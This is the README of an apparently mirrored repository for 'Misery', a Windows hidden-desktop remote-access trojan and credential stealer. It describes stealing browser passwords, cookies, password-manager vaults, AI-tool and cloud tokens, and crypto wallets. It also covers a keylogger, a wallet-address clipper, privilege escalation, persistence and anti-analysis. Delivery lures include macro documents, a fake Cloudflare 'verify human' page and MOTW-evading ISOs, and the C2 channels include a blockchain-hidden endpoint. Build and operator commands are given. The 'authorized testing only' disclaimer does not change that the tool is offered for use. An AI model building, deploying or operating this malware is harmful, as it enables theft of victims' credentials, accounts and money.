╔══════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✠════════════════════════════════════════════════════════════════════════════════════✠           ║
║    MISERY :  •  A  H V N C  T R O J A N  &  S T E A L E R                                        ║
║    WINDOWS HVNC  •  CREDENTIAL STEALER  •  ENCRYPTED C2                                          ║
║ ✠════════════════════════════════════════════════════════════════════════════════════✠           ║
║                                                                                                  ║
║    Fork of the 2023-era Creal stealer. Chrome locked credential decryption behind App-Bound      ║
║    Encryption (ABE) in mid-2024. The agent spawns a suspended browser, reflectively injects a    ║
║    payload DLL, and walks that COM object in-process so decrypted creds never touch disk. ABE    ║
║    research: [xaitax]. Local testing and research only.                                          ║
║                                                                                                  ║
║           NO LICENCE GRANTED. FOR AUTHORIZED TESTING ONLY.                                       ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║                               Contents Index List                                                ║
║                               ‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾                                              ║
║    [ 0x01 ]  ~  What It Is        : The tool in one line.                                        ║
║    [ 0x02 ]  ~  Features          : What it does, grouped by intent.                             ║
║    [ 0x03 ]  ~  How It Works      : The underlying mechanics.                                    ║
║    [ 0x04 ]  ~  Delivery Formats  : The 9 payload wrappers.                                      ║
║    [ 0x05 ]  ~  C2 Modes          : Reverse TCP / CDN / EtherHiding.                             ║
║    [ 0x06 ]  ~  Console Commands  : What the operator types.                                     ║
║    [ 0x07 ]  ~  Setup             : Quick start + build.                                         ║
║    [ 0x08 ]  ~  Project Layout    : Repo structure.                                              ║
║    [ 0x09 ]  ~  Tested On         : Verified targets.                                            ║
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║ [   0x01 - What It Is              ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║    > ;  A Windows remote-access trojan that controls a hidden desktop and steals browser         ║
║         credentials, cookies, sessions, and tokens. It uses reflective injection and encrypted   ║
║         C2, with Chrome App-Bound Encryption support.                                            ║
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║ [   0x02 - Features                ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║    >  WATCH                                                                                      ║
║       + Hidden desktop (hvnc start / hvnc launch chrome) - GDI apps and a real Chromium on a     ║
║         hidden desktop, streamed live.                                                           ║
║       + Ghosted browser (ghost <url>) - hidden Chrome/Edge session riding the victim's cookies   ║
║         and logins.                                                                              ║
║                                                                                                  ║
║    >  STEAL                                                                                      ║
║       + Credential harvesting - Chrome, Edge, Brave, Opera, Opera GX, Firefox.                   ║
║       + Session harvesting - payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH   ║
║         keys, Wi-Fi passwords, wallet extensions, Signal.                                        ║
║       + Password managers - LastPass (raw vault capture), Windows Credential Manager, Proton     ║
║         Pass (raw vault capture).                                                                ║
║       + Games - Minecraft accounts, Roblox cookies, Epic, Battle.net, Riot, Ubisoft, GOG, EA,    ║
║         Rockstar.                                                                                ║
║       + Network clients - WinSCP, PuTTY, mRemoteNG, MobaXterm, OpenVPN.                          ║
║       + AI assistants - Claude Desktop, OpenAI Codex, Gemini CLI, opencode.                      ║
║       + Keylogger and clipboard monitoring - every stroke, every copy, driven by one event       ║
║         channel.                                                                                 ║
║                                                                                                  ║
║    >  CALL HOME                                                                                  ║
║       + Reverse TCP - the agent connects back to the console listener.                           ║
║       + HTTPS beacon via CDN - encrypted frames POST through a Cloudflare Worker and Zero Trust  ║
║         Tunnel; no public IP needed.                                                             ║
║       + EtherHiding - the TCP endpoint resolves from a smart contract on a public chain; the     ║
║         binary carries no C2 address and the C2 rotates by contract call.                        ║
║                                                                                                  ║
║    >  TAKE CRYPTO                                                                                ║
║       + Clipper (clipswap) - clipboard wallet addresses swapped for the operator's address per   ║
║         chain; BIP39 seed phrases captured. Addresses are build-time options (CLIP_BTC=...) -    ║
║         empty skips the chain.                                                                   ║
║       + Seed finder - BIP39 seed phrases, WIF and hex private keys, 2FA secrets, and wallet      ║
║         keyfiles swept from documents and wallet app dirs.                                       ║
║                                                                                                  ║
║    >  STAY                                                                                       ║
║       + Persistence - user-registry Run key and WMI event subscriptions.                         ║
║       + Anti-analysis - user-mode environment checks, reflective injection.                      ║
║   [ hidden ]                                                                                     ║
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║ [   0x03 - How It Works            ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║    >  Channel   : ECDH P-256 handshake. Console keeps the private half in .misery_key; agent     ║
║                   ships the public half only. Fresh AES-256-GCM key per session. No key material ║
║                   repeats across bots.                                                           ║
║                                                                                                  ║
║    >  Stealing  : The v20 master key comes from the COM IElevator service, called inside a       ║
║                   suspended, freshly spawned browser via reflective payload injection so the     ║
║                   process-path check passes. The offline agent falls back to the DPAPI v10 key.  ║
║                   No disk write; the browser never visibly opens.                                ║
║                                                                                                  ║
║    >  HVNC      : GDI apps run on a hidden desktop and stream frames to the operator view.       ║
║                   Ghosted sessions drive a real Chromium over Chrome DevTools Protocol, logged   ║
║                   into the victim's profiles. The browser is them.                               ║
║                                                                                                  ║
║    >  Crypto    : Clipboard wallet addresses swapped per chain; BIP39 seeds, private keys, 2FA   ║
║                   seeds and wallet keyfiles captured from the clipboard and files. Driven by the ║
║                   same event channel as the keylogger.                                           ║
║                                                                                                  ║
║    >  Elevate   : Relaunch as admin via a forged PEB (process environment block) and COM         ║
║                   auto-elevation (CMSTPLUA / ICMLuaUtil), then SYSTEM through SeDebug token      ║
║                   theft from a non-PPL process.                                                  ║
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║ [   0x04 - Delivery Formats         ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║    Build with setup.py -p <formats>. Output goes to dist/ with manifest.json (sha256/size per    ║
║    file). Run --list-formats for full list + dependencies.                                       ║
║                                                                                                  ║
║    Formats:                                                                                      ║
║       + docm       : Word macro; Document_Open chains to cmd/curl download                       ║
║       + xlsm       : Excel macro; Workbook_Open chains to cmd/curl download                      ║
║       + lnk        : Shortcut + .cmd; probes Downloads/Desktop, runs via decoy PDF               ║
║       + pdf        : Agent embedded as PDF attachment                                            ║
║       + html       : OneDrive-style page; agent in zip blob behind button                        ║
║       + clickfix   : Fake Cloudflare 'Verify human' page; copies cmd to clipboard                ║
║       + iso        : ISO container; sidesteps Mark-of-the-Web                                    ║
║       + polyglot_exe_zip    : Runs as exe, opens as zip with .lnk + .cmd                         ║
║       + polyglot_html       : Runs as exe, shows decoy page in browser                           ║
║                                                                                                  ║
║    Formats prefixed 'docm, xlsm, lnk, clickfix, polyglot_exe_zip' fetch from STAGE_URL on open.  ║
║    'pdf, html, iso, polyglot_html' carry the agent. Use -p all to build every format.            ║
║                                                                                                  ║
║    Example:                                                                                      ║
║       python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -p docm,iso -o misery \                  ║
║         STAGE_URL=http://127.0.0.1:8080/misery.exe                                               ║
║                                                                                                  ║
║    Notes:                                                                                        ║
║       • Office bases (docm/xlsm) are pre-compiled. Only inject STAGE_URL + filename.             ║
║       • For lnk/polyglot_exe_zip: host <out>.cmd and <out>.decoy.pdf next to agent.              ║
║       • MOTW on downloads: extract with 7-Zip/WinRAR to bypass SmartScreen.                      ║
║       • Optional deps: pip install pylnk3 pycdlib pikepdf python-docx openpyxl                   ║
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║ [   0x05 - C2 Modes                ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║    Reverse TCP (default):                                                                        ║
║       Agent connects back to console listener. No public IP; you control the endpoint.           ║
║                                                                                                  ║
║    HTTPS beacon via CDN:                                                                         ║
║       Agent POSTs to Cloudflare Worker → Zero Trust Tunnel → console. No public IP. setup.py     ║
║       generates deploy/worker.js + deploy/cloudflared-config.yml. Deploy: wrangler deploy, fill  ║
║       tunnel UUID, cloudflared tunnel run.                                                       ║
║                                                                                                  ║
║    EtherHiding:                                                                                  ║
║       Agent resolves C2 endpoint from smart contract (read-only eth_call). Binary carries no     ║
║       hardcoded address; rotate by updating contract. RPC failure falls back to compiled         ║
║       endpoint.                                                                                  ║
║                                                                                                  ║
║       Deploy resolver: python tools/etherhiding.py update --contract 0x... --value HOST:PORT --k ║
║       Read endpoint:   python tools/etherhiding.py read --contract 0x...                         ║
║                                                                                                  ║
║       Value is bytes32 host:port (31 chars max). Env vars HVNC_CHAIN_RPC / HVNC_CHAIN_CONTRACT   ║
║       override at runtime; explicit argv endpoint overrides chain.                               ║
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║ [   0x06 - Console Commands         ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
╔──────────────────────┬───────────────────────────────────────────────────────────────────────────╗
║bot                   │list bots; bot <id> targets one, bot all broadcasts                        ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║steal                 │run credential and session harvesting                                      ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║loot / dump           │replay the last steal result as boxed terminal sections                    ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║elevate [system]      │relaunch the agent as admin; system chains to SYSTEM                       ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║hvnc start / stop     │start or stop the hidden desktop session                                   ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║hvnc launch [path]    │launch an app (default Chrome) on the hidden desktop                       ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║hvnc quality [10-100] │set streamed frame JPEG quality                                            ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║ghost <url>           │open a URL in a ghosted hidden browser                                     ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║ghost nav <url>       │navigate the ghost browser                                                 ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║ghost stop            │stop the ghost session                                                     ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║keylog                │toggle the keylogger                                                       ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║clip                  │read the victim's clipboard                                                ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║clipswap              │toggle the crypto clipper (address swap + seed capture)                    ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║shell / ps <cmd>      │run a hidden PowerShell one-liner on the agent                             ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║history               │show command history                                                       ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║clear / exit          │clear the terminal / quit                                                  ║
╚──────────────────────┴───────────────────────────────────────────────────────────────────────────╝
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║ [   0x07 - Setup                   ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║    >  Requires cmake and a C++ toolchain (MSVC, MinGW, or Clang). A fresh checkout builds        ║
║       against 127.0.0.1:4444. Run setup.py once so .misery_key exists.                           ║
║                                                                                                  ║
║    >  Quick start  -  setup.py writes src/config.h, saves the console's ECDH key to .misery_key, ║
║         python setup.py -g                                        # interactive                  ║
║         python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent                               ║
║                                                                                                  ║
║    >  Run the console listener, then the agent:                                                  ║
║         .\build\console.exe                                                                      ║
║         .\build\agent.exe                                                                        ║
║                                                                                                  ║
║    >  Type 'help' in the console for the full command list.                                      ║
║                                                                                                  ║
║    >  CDN mode:                                                                                  ║
║         python setup.py -t https_cdn BEACON_URL=https://<you>.workers.dev/poll \                 ║
║           AUTH_SECRET=<secret> TUNNEL_HOST=c2.example.com                                        ║
║                                                                                                  ║
║    >  EtherHiding wired in (or pass it in the wizard under TCP):                                 ║
║         python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 \                                      ║
║           CHAIN_CONTRACT=0x... CHAIN_RPC=https://cloudflare-eth.com                              ║
║                                                                                                  ║
║    >  Build:                                                                                     ║
║         MSVC :  cmake -S . -B build -G "Visual Studio 17 2022" -A x64                            ║
║                  cmake --build build --config Release                                            ║
║         MinGW:  cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release              ║
║                  cmake --build build -j 4                                                        ║
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║ [   0x08 - Project Layout           ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
╔──────────────────────────┬───────────────────────────────────────────────────────────────────────╗
║src/agent                 │entry, C2 client, injector, persistence                                ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/console               │operator console + listener                                            ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/payload               │payload DLL, reflective loader, trampoline                             ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/stealer               │Misery-derived sources                                                 ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/hvnc                  │hidden-desktop session                                                 ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/ghost                 │ghosted browser session                                                ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/browser               │CDP client (Page/Input over WebSocket)                                 ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/rat                   │keylogger + clipboard                                                  ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/clipper               │crypto clipper (address swap, BIP39 seed capture)                      ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/transport             │encrypted TCP framing, HTTPS beacon carrier, compression               ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/evasion               │indirect syscalls, anti-analysis, UAC/token elevation, helpers         ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║tools/                    │operator helpers (EtherHiding resolver read/update)                    ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║wrappers_bases/           │Office-authored compiled macro bases (docm/xlsm)                       ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║build/                    │out-of-source build dir                                                ║
╚──────────────────────────┴───────────────────────────────────────────────────────────────────────╝
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║ [   0x09 - Tested On                ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
╔────────────────────────────┬─────────────────────────────────────────────────────────────────────╗
║Google Chrome               │151.0.7922.140                                                       ║
╠────────────────────────────┼─────────────────────────────────────────────────────────────────────╣
║Microsoft Edge              │151.0.4129.59                                                        ║
╠────────────────────────────┼─────────────────────────────────────────────────────────────────────╣
║Elevation chain             │Windows 11 25H2 (build 26200)                                        ║
╚────────────────────────────┴─────────────────────────────────────────────────────────────────────╝
║                                                                                                  ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║                                                                                                  ║
║    MISERY  •  Windows remote-access trojan and credential stealer                                ║
║                                                                                                  ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════╝
S
Description
Automated archival mirror of churchofmalware.org/JYenn/Misery
Readme
19 MiB
Languages
C++ 87.5%
Python 10.5%
CMake 0.9%
Assembly 0.8%
C 0.3%